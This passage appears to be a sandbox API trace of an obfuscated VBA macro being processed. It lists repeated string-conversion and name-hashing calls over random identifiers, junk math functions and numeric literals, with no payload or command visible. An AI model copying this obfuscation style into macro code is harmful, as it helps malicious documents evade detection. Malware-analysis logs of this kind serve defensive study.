10 [0067.796] VarI4FromStr (in: strIn="258105481", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="542824642") returned 10 [0067.797] VarI4FromStr (in: strIn="542824642", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="435685260") returned 10 [0067.797] VarI4FromStr (in: strIn="435685260", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VA1cDAA") returned 0x10241d [0067.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hBxXBxwG") returned 0x101b39 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="761678711") returned 10 [0067.797] VarI4FromStr (in: strIn="761678711", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="261653279") returned 10 [0067.797] VarI4FromStr (in: strIn="261653279", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAAwDAA") returned 0x10edae [0067.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="804531362") returned 10 [0067.797] VarI4FromStr (in: strIn="804531362", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="410636096") returned 10 [0067.797] VarI4FromStr (in: strIn="410636096", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="432513668") returned 10 [0067.798] VarI4FromStr (in: strIn="432513668", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="746611890") returned 10 [0067.798] VarI4FromStr (in: strIn="746611890", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="875684361") returned 10 [0067.798] VarI4FromStr (in: strIn="875684361", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.798] IMalloc:Realloc (This=0x7fefec05380, pv=0x6754f90, cb=0x900) returned 0xafc1300 [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RAADoAoQ") returned 0x10f856 [0067.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="51709270") returned 9 [0067.798] VarI4FromStr (in: strIn="51709270", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PBwX4QXD") returned 0x10fec3 [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pXx1ACAA") returned 0x10f95a [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kAX4QxDA") returned 0x10f316 [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QAAA_DG1") returned 0x10ab65 [0067.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="393714294") returned 10 [0067.799] VarI4FromStr (in: strIn="393714294", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.799] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mcAGAACD") returned 0x106870 [0067.799] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZxBxcQAw") returned 0x101d45 [0067.799] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jUA4AkAA") returned 0x1023cf [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="828860433") returned 10 [0067.799] VarI4FromStr (in: strIn="828860433", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="252002105") returned 10 [0067.799] VarI4FromStr (in: strIn="252002105", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="492418811") returned 10 [0067.799] VarI4FromStr (in: strIn="492418811", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="926866533") returned 10 [0067.799] VarI4FromStr (in: strIn="926866533", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="343564292") returned 10 [0067.799] VarI4FromStr (in: strIn="343564292", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.799] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s_CDGkQ_") returned 0x1078c2 [0067.799] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.799] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fZA_BUDD") returned 0x10e594 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=8 | out: lpWideCharStr="5509470") returned 8 [0067.799] VarI4FromStr (in: strIn="5509470", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="55945585") returned 9 [0067.800] VarI4FromStr (in: strIn="55945585", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.800] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.800] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GQ14AQA") returned 0x10474b [0067.800] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="452017812") returned 10 [0067.800] VarI4FromStr (in: strIn="452017812", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="564040955") returned 10 [0067.800] VarI4FromStr (in: strIn="564040955", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.800] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="686889086") returned 10 [0067.800] VarI4FromStr (in: strIn="686889086", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="308731958") returned 10 [0067.800] VarI4FromStr (in: strIn="308731958", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.800] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="69954372") returned 9 [0067.800] VarI4FromStr (in: strIn="69954372", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RoAQDA") returned 0x1028c6 [0067.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="665116046") returned 10 [0067.801] VarI4FromStr (in: strIn="665116046", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jZA1BUB") returned 0x109e91 [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IAcADc") returned 0x1097ce [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAQBDUZA") returned 0x10383a [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vooAQBU") returned 0x10356c [0067.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="225307081") returned 10 [0067.801] VarI4FromStr (in: strIn="225307081", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAoA_o1A") returned 0x102330 [0067.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WQUU1kc") returned 0x109617 [0067.802] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fQA4Q_c") returned 0x1075eb [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="351081868") returned 10 [0067.802] VarI4FromStr (in: strIn="351081868", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="244540235") returned 10 [0067.802] VarI4FromStr (in: strIn="244540235", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="891096719") returned 10 [0067.802] VarI4FromStr (in: strIn="891096719", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="145302277") returned 10 [0067.802] VarI4FromStr (in: strIn="145302277", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="45367667") returned 9 [0067.802] VarI4FromStr (in: strIn="45367667", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.802] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SwQDwk") returned 0x1054d6 [0067.802] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.802] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CcGcDZZ") returned 0x103b2d [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="626514729") returned 10 [0067.802] VarI4FromStr (in: strIn="626514729", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="413852199") returned 10 [0067.803] VarI4FromStr (in: strIn="413852199", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.803] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.803] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tA1UAkB") returned 0x107c3b [0067.803] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="488188406") returned 10 [0067.803] VarI4FromStr (in: strIn="488188406", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="524523816") returned 10 [0067.803] VarI4FromStr (in: strIn="524523816", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.803] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="50894717") returned 9 [0067.803] VarI4FromStr (in: strIn="50894717", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="538390704") returned 10 [0067.803] VarI4FromStr (in: strIn="538390704", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.803] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="611012899") returned 10 [0067.804] VarI4FromStr (in: strIn="611012899", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QAAQAA") returned 0x1016e3 [0067.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="924833891") returned 10 [0067.804] VarI4FromStr (in: strIn="924833891", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YDCQkZ") returned 0x10b46a [0067.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 